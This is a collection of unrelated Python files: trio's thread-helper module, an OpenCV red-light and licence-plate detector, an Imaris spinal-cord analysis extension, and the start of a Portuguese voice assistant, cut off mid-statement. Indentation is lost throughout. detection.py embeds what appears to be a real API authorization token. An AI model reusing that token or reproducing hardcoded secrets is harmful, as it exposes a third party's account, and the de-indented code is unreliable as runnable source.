except Exception as ex:
# swallow any exc
logger.error("error while processing runtime event: %r", ex)
|
_threads.py
|
import threading
import queue as stdlib_queue
from itertools import count
import attr
import outcome
import trio
from ._sync import CapacityLimiter
from ._core import enable_ki_protection, disable_ki_protection, RunVar, TrioToken
# Global due to Threading API, thread local storage for trio token
TOKEN_LOCAL = threading.local()
class BlockingTrioPortal:
def __init__(self, trio_token=None):
if trio_token is None:
trio_token = trio.hazmat.current_trio_token()
self._trio_token = trio_token
def run(self, afn, *args):
return from_thread_run(afn, *args, trio_token=self._trio_token)
def run_sync(self, fn, *args):
return from_thread_run_sync(fn, *args, trio_token=self._trio_token)
################################################################
# XX at some point it probably makes sense to implement some sort of thread
# pool? Or at least that's what everyone says.
#
# There are two arguments for thread pools:
# - speed (re-using threads instead of starting new ones)
# - throttling (if you have 1000 tasks, queue them up instead of spawning 1000
# threads and running out of memory)
#
# Regarding speed, it's not clear how much of an advantage this is. Some
# numbers on my Linux laptop:
#
# Spawning and then joining a thread:
#
# In [25]: %timeit t = threading.Thread(target=lambda: None); t.start(); t.join()
# 10000 loops, best of 3: 44 µs per loop
#
# Using a thread pool:
#
# In [26]: tpp = concurrent.futures.ThreadPoolExecutor()
# In [27]: %timeit tpp.submit(lambda: None).result()
# <warm up run elided>
# In [28]: %timeit tpp.submit(lambda: None).result()
# 10000 loops, best of 3: 40.8 µs per loop
#
# What's a fast getaddrinfo look like?
#
# # with hot DNS cache:
# In [23]: %timeit socket.getaddrinfo("google.com", "80")
# 10 loops, best of 3: 50.9 ms per loop
#
# In [29]: %timeit socket.getaddrinfo("127.0.0.1", "80")
# 100000 loops, best of 3: 9.73 µs per loop
#
#
# So... maybe we can beat concurrent.futures with a super-efficient thread
# pool or something, but there really is not a lot of headroom here.
#
# Of course other systems might be different... here's CPython 3.6 in a
# Virtualbox VM running Windows 10 on that same Linux laptop:
#
# In [13]: %timeit t = threading.Thread(target=lambda: None); t.start(); t.join()
# 10000 loops, best of 3: 127 µs per loop
#
# In [18]: %timeit tpp.submit(lambda: None).result()
# 10000 loops, best of 3: 31.9 µs per loop
#
# So on Windows there *might* be an advantage? You've gotta be doing a lot of
# connections, with very fast DNS indeed, for that 100 us to matter. But maybe
# someone is.
#
#
# Regarding throttling: this is very much a trade-off. On the one hand, you
# don't want to overwhelm the machine, obviously. On the other hand, queueing
# up work on a central thread-pool creates a central coordination point which
# can potentially create deadlocks and all kinds of fun things. This is very
# context dependent. For getaddrinfo, whatever, they'll make progress and
# complete (we hope), and you want to throttle them to some reasonable
# amount. For calling waitpid() (because just say no to SIGCHLD), then you
# really want one thread-per-waitpid(), because for all you know the user has
# written some ridiculous thing like:
#
# for p in processes:
# await spawn(p.wait)
# # Deadlock here if there are enough processes:
# await some_other_subprocess.wait()
# for p in processes:
# p.terminate()
#
# This goes doubly for the sort of wacky thread usage we see in curio.abide
# (though, I'm not sure if that's actually useful in practice in our context,
# run_in_trio_thread seems like it might be a nicer synchronization primitive
# for most uses than trying to make threading.Lock awaitable).
#
# See also this very relevant discussion:
#
# https://twistedmatrix.com/trac/ticket/5298
#
# "Interacting with the products at Rackspace which use Twisted, I've seen
# problems caused by thread-pool maximum sizes with some annoying
# regularity. The basic problem is this: if you have a hard limit on the
# number of threads, *it is not possible to write a correct program which may
# require starting a new thread to un-block a blocked pool thread*" - glyph
#
# For now, if we want to throttle getaddrinfo I think the simplest thing is
# for the socket code to have a semaphore for getaddrinfo calls.
#
# Regarding the memory overhead of threads, in theory one should be able to
# reduce this a *lot* for a thread that's just calling getaddrinfo or
# (especially) waitpid. Windows and pthreads both offer the ability to set
# thread stack size on a thread-by-thread basis. Unfortunately as of 3.6
# CPython doesn't expose this in a useful way (all you can do is set it
# globally for the whole process, so it's - ironically - not thread safe).
#
# (It's also unclear how much stack size actually matters; on a 64-bit Linux
# server with overcommit -- i.e., the most common configuration -- then AFAICT
# really the only real limit is on stack size actually *used*; how much you
# *allocate* should be pretty much irrelevant.)
_limiter_local = RunVar("limiter")
# I pulled this number out of the air; it isn't based on anything. Probably we
# should make some kind of measurements to pick a good value.
DEFAULT_LIMIT = 40
_thread_counter = count()
def current_default_thread_limiter():
"""Get the default `~trio.CapacityLimiter` used by
`trio.to_thread.run_sync`.
The most common reason to call this would be if you want to modify its
:attr:`~trio.CapacityLimiter.total_tokens` attribute.
"""
try:
limiter = _limiter_local.get()
except LookupError:
limiter = CapacityLimiter(DEFAULT_LIMIT)
_limiter_local.set(limiter)
return limiter
# Eventually we might build this into a full-fledged deadlock-detection
# system; see https://github.com/python-trio/trio/issues/182
# But for now we just need an object to stand in for the thread, so we can
# keep track of who's holding the CapacityLimiter's token.
@attr.s(frozen=True, eq=False, hash=False)
class ThreadPlaceholder:
name = attr.ib()
@enable_ki_protection
async def to_thread_run_sync(sync_fn, *args, cancellable=False, limiter=None):
"""Convert a blocking operation into an async operation using a thread.
These two lines are equivalent::
sync_fn(*args)
await trio.to_thread.run_sync(sync_fn, *args)
except that if ``sync_fn`` takes a long time, then the first line will
block the Trio loop while it runs, while the second line allows other Trio
tasks to continue working while ``sync_fn`` runs. This is accomplished by
pushing the call to ``sync_fn(*args)`` off into a worker thread.
From inside the worker thread, you can get back into Trio using the
functions in `trio.from_thread`.
Args:
sync_fn: An arbitrary synchronous callable.
*args: Positional arguments to pass to sync_fn. If you need keyword
arguments, use :func:`functools.partial`.
cancellable (bool): Whether to allow cancellation of this operation. See
discussion below.
limiter (None, or CapacityLimiter-like object):
An object used to limit the number of simultaneous threads. Most
commonly this will be a `~trio.CapacityLimiter`, but it could be
anything providing compatible
:meth:`~trio.CapacityLimiter.acquire_on_behalf_of` and
:meth:`~trio.CapacityLimiter.release_on_behalf_of` methods. This
function will call ``acquire_on_behalf_of`` before starting the
thread, and ``release_on_behalf_of`` after the thread has finished.
If None (the default), uses the default `~trio.CapacityLimiter`, as
returned by :func:`current_default_thread_limiter`.
**Cancellation handling**: Cancellation is a tricky issue here, because
neither Python nor the operating systems it runs on provide any general
mechanism for cancelling an arbitrary synchronous function running in a
thread. This function will always check for cancellation on entry, before
starting the thread. But once the thread is running, there are two ways it
can handle being cancelled:
* If ``cancellable=False``, the function ignores the cancellation and
keeps going, just like if we had called ``sync_fn`` synchronously. This
is the default behavior.
* If ``cancellable=True``, then this function immediately raises
`~trio.Cancelled`. In this case **the thread keeps running in
background** – we just abandon it to do whatever it's going to do, and
silently discard any return value or errors that it raises. Only use
this if you know that the operation is safe and side-effect free. (For
      example: :func:`trio.socket.getaddrinfo` uses a thread with
``cancellable=True``, because it doesn't really affect anything if a
stray hostname lookup keeps running in the background.)
The ``limiter`` is only released after the thread has *actually*
finished – which in the case of cancellation may be some time after this
function has returned. If :func:`trio.run` finishes before the thread
does, then the limiter release method will never be called at all.
.. warning::
You should not use this function to call long-running CPU-bound
functions! In addition to the usual GIL-related reasons why using
threads for CPU-bound work is not very effective in Python, there is an
additional problem: on CPython, `CPU-bound threads tend to "starve out"
IO-bound threads <https://bugs.python.org/issue7946>`__, so using
threads for CPU-bound work is likely to adversely affect the main
thread running Trio. If you need to do this, you're better off using a
worker process, or perhaps PyPy (which still has a GIL, but may do a
better job of fairly allocating CPU time between threads).
Returns:
Whatever ``sync_fn(*args)`` returns.
Raises:
Exception: Whatever ``sync_fn(*args)`` raises.
"""
await trio.hazmat.checkpoint_if_cancelled()
token = trio.hazmat.current_trio_token()
if limiter is None:
limiter = current_default_thread_limiter()
# Holds a reference to the task that's blocked in this function waiting
# for the result – or None if this function was cancelled and we should
# discard the result.
task_register = [trio.hazmat.current_task()]
name = "trio-worker-{}".format(next(_thread_counter))
placeholder = ThreadPlaceholder(name)
# This function gets scheduled into the Trio run loop to deliver the
# thread's result.
def report_back_in_trio_thread_fn(result):
def do_release_then_return_result():
# release_on_behalf_of is an arbitrary user-defined method, so it
# might raise an error. If it does, we want that error to
# replace the regular return value, and if the regular return was
# already an exception then we want them to chain.
try:
return result.unwrap()
finally:
limiter.release_on_behalf_of(placeholder)
result = outcome.capture(do_release_then_return_result)
if task_register[0] is not None:
trio.hazmat.reschedule(task_register[0], result)
# This is the function that runs in the worker thread to do the actual
# work and then schedule the call to report_back_in_trio_thread_fn
# Since this is spawned in a new thread, the trio token needs to be passed
# explicitly to it so it can inject it into thread local storage
def worker_thread_fn(trio_token):
TOKEN_LOCAL.token = trio_token
try:
result = outcome.capture(sync_fn, *args)
try:
token.run_sync_soon(report_back_in_trio_thread_fn, result)
except trio.RunFinishedError:
# The entire run finished, so our particular task is certainly
# long gone -- it must have cancelled.
pass
finally:
del TOKEN_LOCAL.token
await limiter.acquire_on_behalf_of(placeholder)
try:
# daemon=True because it might get left behind if we cancel, and in
# this case shouldn't block process exit.
current_trio_token = trio.hazmat.current_trio_token()
thread = threading.Thread(
target=worker_thread_fn,
args=(current_trio_token,),
name=name,
daemon=True
)
thread.start()
except:
limiter.release_on_behalf_of(placeholder)
raise
def abort(_):
if cancellable:
task_register[0] = None
return trio.hazmat.Abort.SUCCEEDED
else:
return trio.hazmat.Abort.FAILED
return await trio.hazmat.wait_task_rescheduled(abort)
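# --- Usage sketch for the function above (exposed publicly as trio.to_thread.run_sync):
# run a blocking call on a worker thread while other Trio tasks keep running, and cap
# the number of concurrent threads with an explicit CapacityLimiter. Assumes a trio
# release that already exports the trio.to_thread / trio.from_thread namespaces; the
# demo function name is illustrative only.
import functools
import time
import trio
async def _to_thread_demo():
    limiter = trio.CapacityLimiter(2)  # at most two worker threads at once
    async with trio.open_nursery() as nursery:
        for _ in range(4):
            # limiter is keyword-only, so wrap the call with functools.partial
            nursery.start_soon(
                functools.partial(trio.to_thread.run_sync, time.sleep, 0.1, limiter=limiter))
if __name__ == "__main__":
    trio.run(_to_thread_demo)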
def _run_fn_as_system_task(cb, fn, *args, trio_token=None):
"""Helper function for from_thread.run and from_thread.run_sync.
Since this internally uses TrioToken.run_sync_soon, all warnings about
raised exceptions canceling all tasks should be noted.
"""
if trio_token and not isinstance(trio_token, TrioToken):
raise RuntimeError("Passed kwarg trio_token is not of type TrioToken")
if not trio_token:
try:
trio_token = TOKEN_LOCAL.token
except AttributeError:
raise RuntimeError(
"this thread wasn't created by Trio, pass kwarg trio_token=..."
)
# TODO: This is only necessary for compatibility with BlockingTrioPortal.
# once that is deprecated, this check should no longer be necessary because
# thread local storage (or the absence of) is sufficient to check if trio
# is running in a thread or not.
try:
trio.hazmat.current_task()
except RuntimeError:
pass
else:
raise RuntimeError(
"this is a blocking function; call it from a thread"
)
q = stdlib_queue.Queue()
trio_token.run_sync_soon(cb, q, fn, args)
return q.get().unwrap()
def from_thread_run(afn, *args, trio_token=None):
"""Run the given async function in the parent Trio thread, blocking until it
is complete.
Returns:
Whatever ``afn(*args)`` returns.
Returns or raises whatever the given function returns or raises. It
can also raise exceptions of its own:
Raises:
RunFinishedError: if the corresponding call to :func:`trio.run` has
already completed.
Cancelled: if the corresponding call to :func:`trio.run` completes
while ``afn(*args)`` is running, then ``afn`` is likely to raise
            :exc:`trio.Cancelled`, and this will propagate out of this function.
RuntimeError: if you try calling this from inside the Trio thread,
which would otherwise cause a deadlock.
AttributeError: if no ``trio_token`` was provided, and we can't infer
one from context.
**Locating a Trio Token**: There are two ways to specify which
`trio.run` loop to reenter:
- Spawn this thread from `trio.to_thread.run_sync`. Trio will
automatically capture the relevant Trio token and use it when you
want to re-enter Trio.
    - Pass a keyword argument, ``trio_token`` specifying a specific
`trio.run` loop to re-enter. This is useful in case you have a
"foreign" thread, spawned using some other framework, and still want
to enter Trio.
"""
def callback(q, afn, args):
@disable_ki_protection
async def unprotected_afn():
return await afn(*args)
async def await_in_trio_thread_task():
q.put_nowait(await outcome.acapture(unprotected_afn))
trio.hazmat.spawn_system_task(await_in_trio_thread_task, name=afn)
return _run_fn_as_system_task(callback, afn, *args, trio_token=trio_token)
def from_thread_run_sync(fn, *args, trio_token=None):
"""Run the given sync function in the parent Trio thread, blocking until it
is complete.
Returns:
Whatever ``fn(*args)`` returns.
Returns or raises whatever the given function returns or raises. It
can also raise exceptions of its own:
Raises:
RunFinishedError: if the corresponding call to `trio.run` has
already completed.
Cancelled: if the corresponding call to `trio.run` completes
            while ``fn(*args)`` is running, then ``fn`` is likely to raise
            :exc:`trio.Cancelled`, and this will propagate out of this function.
RuntimeError: if you try calling this from inside the Trio thread,
which would otherwise cause a deadlock.
AttributeError: if no ``trio_token`` was provided, and we can't infer
one from context.
**Locating a Trio Token**: There are two ways to specify which
`trio.run` loop to reenter:
- Spawn this thread from `trio.to_thread.run_sync`. Trio will
automatically capture the relevant Trio token and use it when you
want to re-enter Trio.
    - Pass a keyword argument, ``trio_token`` specifying a specific
`trio.run` loop to re-enter. This is useful in case you have a
"foreign" thread, spawned using some other framework, and still want
to enter Trio.
"""
def callback(q, fn, args):
@disable_ki_protection
def unprotected_fn():
return fn(*args)
res = outcome.capture(unprotected_fn)
q.put_nowait(res)
return _run_fn_as_system_task(callback, fn, *args, trio_token=trio_token)
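# --- Re-entry sketch for the two helpers above: a thread started via
# trio.to_thread.run_sync can hop back into the parent Trio loop with
# trio.from_thread.run_sync; the Trio token is captured automatically in that case.
# The demo function names are illustrative only.
import trio
def _blocking_worker():
    # runs in a worker thread; re-enter Trio just to read Trio's clock there
    return trio.from_thread.run_sync(trio.current_time)
async def _from_thread_demo():
    print(await trio.to_thread.run_sync(_blocking_worker))
if __name__ == "__main__":
    trio.run(_from_thread_demo)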
|
detection.py
|
import cv2
import numpy as np
import matplotlib.path as mplPath
import time
from datetime import datetime
import os
import threading
import requests
# --------------------- GLOBAL --------------- #
poly_ne = np.array([[793,351],[920,466],[1102,420],[961,329]])
tl = (1106,100)
br = (1153,203)
cap = cv2.VideoCapture("test_video.mp4")
img_folder = "./image/"
# Plate Recognizer
regions = ['vn']
IS_FREE = True
ImageNode = []
#----------------------------------------------#
#---------------------- UTILS FUNCTION ---------------#
def pega_centro(x, y, w, h):
x1 = int(w / 2)
y1 = int(h / 2)
cx = x + x1
cy = y + y1
return cx,cy
def inside_poly(pnts, poly):
bbPath = mplPath.Path(poly)
return bbPath.contains_point(pnts)
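# Quick sanity check of the helper above: matplotlib's Path.contains_point returns
# True for a point inside the closed polygon and False outside, which is how vehicle
# centres are tested against the red-light zone further down.
assert inside_poly((900, 400), poly_ne)      # a centre inside the monitored zone
assert not inside_poly((10, 10), poly_ne)    # a point far outside the zone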
def detect_plate(path):
    global IS_FREE  # without this, the module-level flag set below is never reset
    with open(path, 'rb') as fp:
response = requests.post(
'https://api.platerecognizer.com/v1/plate-reader/',
data=dict(regions=regions), # Optional
files=dict(upload=fp),
headers={'Authorization': 'Token 11e12906b07074d87046cb0e3b530f55dd85a2c1'})
result = response.json()['results']
IS_FREE = True
print(result)
#------------------------------------------------------#
ret, frame1 = cap.read()
ret, frame2 = cap.read()
while cap.isOpened():
#Detect Red-light
if frame1 is None or frame2 is None:
break
hsv_Frame = cv2.cvtColor(frame1[tl[1]:br[1], tl[0]:br[0]], cv2.COLOR_BGR2HSV)
low_red = np.array([161, 155, 84], np.uint8)
high_red = np.array([179, 255, 255], np.uint8)
mask_red = cv2.inRange(hsv_Frame, low_red, high_red)
coord=cv2.findNonZero(mask_red)
#Detect moving
    try:
        diff = cv2.absdiff(frame1, frame2)
    except cv2.error:
        # the frame difference could not be computed (e.g. end of stream); stop processing
        print("error computing frame difference")
        break
gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(gray, (5,5), 0)
_, thresh = cv2.threshold(blur, 20, 255, cv2.THRESH_BINARY)
dilated = cv2.dilate(thresh, None, iterations=3)
contours, _ = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    if coord is not None:
poly = cv2.polylines(frame1, [poly_ne] ,True, (0, 0, 255),3)
cv2.putText(frame1, "Status: {}".format('Den_do'), (10, 20), cv2.FONT_HERSHEY_SIMPLEX,
1, (0, 0, 255), 3)
for contour in contours:
(x, y, w, h) = cv2.boundingRect(contour)
if cv2.contourArea(contour) < 10000:
continue
centro = pega_centro(x, y, w, h)
x1, y1, w1, h1 = x, y, w, h
circle_o = cv2.circle(frame1, centro, 4, (0, 0, 255), -1)
rectangel = cv2.rectangle(frame1, (x, y), (x + w, y + h), (0, 255, 0), 2)
if inside_poly(centro, poly_ne):
cv2.imshow("crop", frame2[y1: y1 + h1, x1: x1 + w1])
path = "%s%s_%s\\" % (img_folder, datetime.today().strftime("%Y_%m_%d"),int(time.time()))
if not os.path.exists(path):
os.makedirs(path)
#cv2.imwrite(path + "overview.png", frame1)
cv2.imwrite(path + "detailed.png", frame2[y1: y1 + h1, x1: x1 + w1])
#detect_plate(path + "detailed.png")
ImageNode.append(path+"detailed.png")
else:
cv2.putText(frame1, "Status: {}".format('Den_xanh'), (10, 20), cv2.FONT_HERSHEY_SIMPLEX,
1, (0, 255, 0), 3)
print(ImageNode)
if IS_FREE and len(ImageNode) > 0:
IS_FREE = False
thread = threading.Thread(target=detect_plate, args=(ImageNode.pop(0),))
thread.start()
cv2.imshow("feed", frame1)
#cv2.imwrite("image.png", frame1)
frame1 = frame2
_, frame2 = cap.read()
if cv2.waitKey(33) & 0xFF == ord("q"):
break
cv2.destroyAllWindows()
cap.release()
|
xtscr.py
|
#
# Spinal Cord Recovery XTension
#
# Copyright (c) 2016 Keith Schulze (keith.schulze@monash.edu)
# MIT-style copyright and disclaimer apply
#
# <CustomTools>
# <Menu>
# <Item name="SCR" icon="Python" tooltip="Spinal Cord Recovery">
# <Command>PythonXT::xtscr(%i)</Command>
# </Item>
# </Menu>
# </CustomTools>
#
""" Imaris Xtension for the analysis of Spinal Cord Recovery in live
confocal images.
"""
import math
import os
import time
import threading
import tkinter as tk
from queue import Empty, Queue
from tkinter import ttk, filedialog, messagebox
import numpy as np
import pandas as pd
from pIceImarisConnector import pIceImarisConnector as ice
from scr import scr
class SCRGUI(object):
"""docstring for SCRGUI"""
def __init__(self, master, queue):
self.queue = queue
self.labeltext = tk.StringVar()
self.labeltext.set("SCR Processing")
label = tk.Label(master, width=50, textvariable=self.labeltext)
self.prog = ttk.Progressbar(master, orient='horizontal', length=300,
mode='determinate')
label.pack(padx=10, pady=10)
self.prog.pack(padx=10, pady=10)
def processincoming(self):
while self.queue.qsize():
try:
msg, prog = self.queue.get(0)
self.labeltext.set(msg)
self.prog.step(prog)
except Empty:
pass
class SCRProcessor(object):
"""docstring for SCRProcessor"""
def __init__(self, master, conn):
super(SCRProcessor, self).__init__()
self.master = master
self.conn = conn
self.queue = Queue()
self.gui = SCRGUI(master, self.queue)
self.running = True
self.dataset_name, _ = os.path.splitext(
os.path.basename(conn.mImarisApplication.GetCurrentFileName())
)
dir_options = {'mustexist': True,
'title': 'Please select an output directory'}
self.output_dir = filedialog.askdirectory(**dir_options)
if len(self.output_dir) == 0:
self.master.quit()
raise Exception("Open folder cancelled")
threading.Thread(target=self.workerthread).start()
self.periodiccall()
def periodiccall(self):
self.gui.processincoming()
if self.running:
self.master.after(10, self.periodiccall)
def extract_sc_centres(self, t):
"""Extract central axes for a specified time point.
Parameters
----------
t: int
timepoint
Returns
-------
axes: np.ndarray (float)
2 x 3 array storing coords for the start and end coords of
the central axis for the given timepoint.
"""
self.queue.put(("Extracting central axis for timepoint: " + str(t), 1))
vol = self.conn.getDataVolume(0, t)
return scr.extract_sc_centres(vol, 1, slices=50)
def workerthread(self):
if not os.path.exists(self.output_dir):
print("Folder path does not exist")
messagebox.showwarning(
"nonexistent folder",
"Folder does not exist!"
)
time.sleep(2)
self.master.quit()
raise Exception("Folder not found.")
self.queue.put(("Getting dataset dimensions", 1))
# Get dataset parameters
xsize, ysize, zsize, csize, tsize = self.conn.getSizes()
xvox, yvox, zvox = self.conn.getVoxelSizes()
xmin, _, ymin, _, zmin, _ = self.conn.getExtends()
# Determine central axis in each frame
central_axis_cache = os.path.join(self.output_dir,
self.dataset_name+".npy")
if os.path.exists(central_axis_cache):
self.queue.put(("Extracting central axis for each time point.", 90))
sc_centre_coords = np.load(central_axis_cache)
else:
sc_centre_coords = np.array(
[self.extract_sc_centres(t) for t in range(tsize)])
# Convert to physical coords using voxel sizes
sc_centre_coords[:,:,0] = sc_centre_coords[:,:,0] * xvox + xmin
sc_centre_coords[:,:,1] = sc_centre_coords[:,:,1] * yvox + ymin
sc_centre_coords[:,:,2] = sc_centre_coords[:,:,2] * zvox + zmin
np.save(central_axis_cache, sc_centre_coords)
# Get the lesion coords from the measurement points object
self.queue.put(("Retrieve lesion coordinates", 1))
mps = self.conn.getAllSurpassChildren(False, "MeasurementPoints")
if not mps:
print("No measurement points marking lesion site specified")
messagebox.showerror("No lesion site",
"Please use measurement points to indicate"
" lesion site and centre of the notochord"
" perpendicular to lesion.")
self.master.quit()
return
lesion_coords = SCRProcessor.get_lesion_coordinates(mps[0])
# Get spot coords from the selected spots object
self.queue.put(("Retrieve spot coordinates", 1))
spots = None
try:
spots = self.conn.getSurpassSelection("Spots")
except Exception as err:
messagebox.showerror("No Spots object selected",
"No spots object found or selected.")
self.master.quit()
return
if not spots:
print("No spots were found. Please select spots object you want"
"to analyse.")
messagebox.showerror("No Spots",
"No spots object founds or not selected."
" Please select the spots object to want"
" analyse")
self.master.quit()
return
spot_coords = np.array(spots.GetPositionsXYZ(), dtype=float)
# Create a pandas dataframe to summarise data
self.queue.put(("Creating dataframe", 1))
spot_df = pd.DataFrame(spot_coords.view(dtype=[('x', float),
('y', float),
('z', float)]).ravel())
# Add tracks to the dataframe
spot_df["track"] = np.zeros(len(spot_df["x"]))
spot_track_edges = spots.GetTrackEdges()
spot_track_ids = spots.GetTrackIds()
for i, e in zip(spot_track_ids, spot_track_edges):
if spot_df.loc[e[0], "track"] == 0:
spot_df.loc[e[0], "track"] = i
if spot_df.loc[e[1], "track"] == 0:
spot_df.loc[e[1], "track"] = i
spot_df.track = spot_df.track.astype(int).astype(str)
spot_df['time'] = np.array(spots.GetIndicesT(), float) *\
self.conn.mImarisApplication.GetDataSet().GetTimePointsDelta()
# Add time index
spot_df['tindex'] = np.array(spots.GetIndicesT())
# Register to cylindrical coordinates
self.queue.put(("Registering on cylindrical coordinate system", 1))
spot_df[['r', 'l', 'theta']] = scr.register_cylinder(spot_df, sc_centre_coords,
lesion_coords)
spot_df['abs_r'] = np.abs(spot_df['r'])
spot_df['theta_deg'] = np.rad2deg(np.add(spot_df.theta, np.pi))
self.queue.put(("Saving dataframe", 1))
spot_df.to_csv(os.path.join(self.output_dir, self.dataset_name+".csv"))
self.running = False
self.master.quit()
@classmethod
def get_lesion_coordinates(cls, measurement_points):
""" Get Lesion coordinates from a measurement points object.
Parameters
----------
measurement_points: MeasurementPoints object
MeasurementPoints object from Imaris
Returns
-------
lesion_coords: numpy.ndarray
2 x 3 ndarray array representing coordinates for
lesion site and centre of the notochord perpendicular
to the lesion site.
"""
return np.array(measurement_points.GetPositionsXYZ(), float)
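# workerthread() converts the cached central-axis coordinates from voxel indices to physical
# units with physical = voxel * voxel_size + extent_min, applied per axis. A minimal sketch
# of that conversion with made-up voxel sizes and extents (illustrative only):
#
#   import numpy as np
#   axes = np.array([[[10.0, 20.0, 5.0], [200.0, 20.0, 5.0]]])  # (t, 2, 3) voxel coords
#   vox = (0.5, 0.5, 2.0)                                       # assumed voxel sizes
#   mins = (0.0, 0.0, -10.0)                                    # assumed extent minima
#   for axis in range(3):
#       axes[:, :, axis] = axes[:, :, axis] * vox[axis] + mins[axis]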
def xtscr(appid):
"""Entry function for the Imaris XTension."""
conn = ice(appid)
if not conn.isAlive():
print("Could not connect to Imaris")
messagebox.showwarning("Connection failed",
"Could not connect to Imaris!")
time.sleep(2)
return
root = tk.Tk()
client = SCRProcessor(root, conn)
root.mainloop()
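# SCRProcessor hands progress to the Tk GUI with a thread-safe pattern: the worker thread
# puts (message, increment) tuples on a Queue and the Tk main loop polls it with after().
# A minimal standalone sketch of that pattern (names below are illustrative, not part of
# the XTension):
#
#   import queue, threading, tkinter as tk
#   q = queue.Queue()
#   root = tk.Tk()
#   def worker():
#       for i in range(5):
#           q.put(("step %d" % i, 20))
#   def poll():
#       while not q.empty():
#           print(q.get_nowait())
#       root.after(100, poll)
#   threading.Thread(target=worker).start()
#   poll()
#   root.mainloop()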
|
ROXXANE4.py
|
from json import loads
from math import pow
from os import getlogin, listdir
from os.path import exists
from pickle import load, dump
from random import randint
from sys import exit
import threading
import webbrowser
from subprocess import check_output
from datetime import datetime, date
# from time import sleep
from tkinter import Tk, Button, PhotoImage, Label, Entry, Toplevel
# from tkinter import messagebox
import pandas as pd
from psutil import cpu_percent, virtual_memory
from pyaudio import PyAudio, paInt16
import pyautogui
from pyperclip import copy
from pyttsx3 import init
import qrcode
from requests import exceptions, get
import speech_recognition as sr
from wikipedia import set_lang, summary
from plyer import notification
# from tqdm import tqdm
from vosk import Model, KaldiRecognizer
from multiprocessing.pool import ThreadPool
import numpy as np
from pybrain import TanhLayer
from pybrain.tools.shortcuts import buildNetwork
from pybrain.supervised.trainers.backprop import BackpropTrainer
from pybrain.datasets.supervised import SupervisedDataSet
import win32com.client as win32
import re
engine = init()
model = Model("model")
rec = KaldiRecognizer(model, 16000)
p = PyAudio()
stream = p.open(format=paInt16, channels=1, rate=16000, input=True, frames_per_buffer=8000)
stream.start_stream()
despedidas = ['tchal', 'adeus', 'te vejo mais tarde', 'até', 'até logo']
class ROXXANE(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)  # Roxxane's worker thread
self.voz_data = ''
self.aux = ''
# speech/response database
self.arquivoR = open(r"databaseR.txt", 'r', encoding='utf-8')
self.arquivoR = self.arquivoR.read()
self.arquivoR = self.arquivoR.split()
self.opcoes = []
for i in range(len(self.arquivoR)):
if i >= 5:
if self.arquivoR[i] == "-1":
break
self.opcoes.append(self.arquivoR[i])
self.pessoa = self.arquivoR[1]
self.nome_assistente = self.arquivoR[3]
self.arquivoF = open(r"databaseF.txt", 'r', encoding='utf-8')
self.arquivoF = self.arquivoF.read()
self.arquivoF = self.arquivoF.split()
self.pool = ThreadPool(processes=1)
# neural network setup
self.arquivoC = open(r'databaseC.txt', 'r', encoding='utf-8')
self.arquivoC = self.arquivoC.read()
self.arquivoC = self.arquivoC.split()
self.codigos = [[int(i)] for i in self.arquivoC if i.isnumeric()]
self.frases = [str(i).replace("_", " ") for i in self.arquivoC if not i.isnumeric()]
self.vocabulario = []
self.var = ""
self.is_run = True
def construir_vocabulario(self, sentences):
for sentence in sentences:
for palavra in sentence.split(" "):
if palavra not in self.vocabulario:
self.vocabulario.append(palavra)
def criar_array(self, sentences):
palavras = sentences.split(' ')
vetor = np.zeros(len(self.vocabulario))
for palavra in palavras:
for i, _palavra in enumerate(self.vocabulario):
if _palavra == palavra:
vetor[i] = 1
return list(vetor)
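# construir_vocabulario()/criar_array() implement a plain bag-of-words encoding: every known
# word gets a position in the vocabulary and a sentence becomes a 0/1 vector over those
# positions. Illustrative sketch with made-up phrases (the real ones come from databaseC.txt):
#
#   vocab = []
#   for s in ["abrir o google", "pesquise no youtube"]:
#       for w in s.split(" "):
#           if w not in vocab:
#               vocab.append(w)
#   # vocab == ['abrir', 'o', 'google', 'pesquise', 'no', 'youtube']
#   # criar_array("abrir o youtube") would then yield [1, 1, 0, 0, 0, 1]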
def criar_dataset(self):
self.construir_vocabulario(self.frases)
entradas = []
for sentence in self.frases:
vetor = self.criar_array(sentence)
passe = []
for num in vetor:
passe.append(num)
entradas.append(passe)
self.ds = SupervisedDataSet(self.get_len(), 1)
for i, j in zip(entradas, self.codigos):
self.ds.addSample(i, j)
def treinar_rede(self):
self.netWork = buildNetwork(self.get_len(), 5, 5, 1, bias=True, hiddenclass=TanhLayer)
back = BackpropTrainer(self.netWork, self.ds)
for i in range(2000):
back.train()
with open('rede_neural.xml', 'wb') as fa:
dump(self.netWork, fa, 0)
def retornar_valor_previsto(self, texto):
num = f"{float(self.netWork.activate(self.criar_array(texto))):,.0f}"
return float(num)
def get_len(self):
return len(self.vocabulario)
# everything above belongs to the neural network
def existe(self, termos):
for termo in termos:
if termo in self.voz_data:
return True
@staticmethod
def pegar_comandos_separados():
while True:
rec.pause_threshold = 1
data = stream.read(10000)
if len(data) == 0:
break
if rec.AcceptWaveform(data):
resultado = rec.FinalResult()
resultado = loads(resultado)
if resultado is not None:
return resultado['text'].lower()
def conversas(self):
if self.existe(['hey', 'hi', 'hello', 'oi', 'holla']):
saudacoes = [f'Oi {self.pessoa}, o que você está fazendo hoje?',
f'Oi {self.pessoa}, como eu posso te ajudar?',
f'Oi {self.pessoa}, você precisa de algo?',
f'Oi {self.pessoa}, como vai você?']
resposta = saudacoes[randint(0, len(saudacoes) - 1)]
self.engine_fala(resposta)
self.voz_data = ' '
return
elif self.existe(['tudo bem', 'como você está', 'está tudo bem', 'está tude bem com você']):
frases = [f'eu estou bem, {self.pessoa}, obrigada',
f'estou bem, muito obrigada, {self.pessoa}',
f'eu estou bem {self.pessoa}, como vai você?']
fala = frases[randint(0, len(frases) - 1)]
self.engine_fala(fala)
self.voz_data = ' '
return
elif self.existe(['qual é seu nome', 'me dia seu nome', 'seu nome é', 'seu nome']):
self.engine_fala(f'Meu nome é {self.nome_assistente}')
return
elif self.existe(['como você está', 'está tudo bem com você', 'está feliz']):
falas = [f'eu estou bem {self.pessoa}, obrigada por se preocupar',
f'eu estou ótima, {self.pessoa}, obrigada',
f'eu estou muito feliz como estou hoje, {self.pessoa}']
fala = falas[randint(0, len(falas) - 1)]
self.engine_fala(fala)
self.voz_data = ' '
return
elif self.existe(['cu', 'caralho', 'porra', 'tá surda', 'cú']):
self.engine_fala('Olha a boca menino')
self.engine_fala('tenha modas')
self.voz_data = ' '
return
elif self.existe(despedidas):
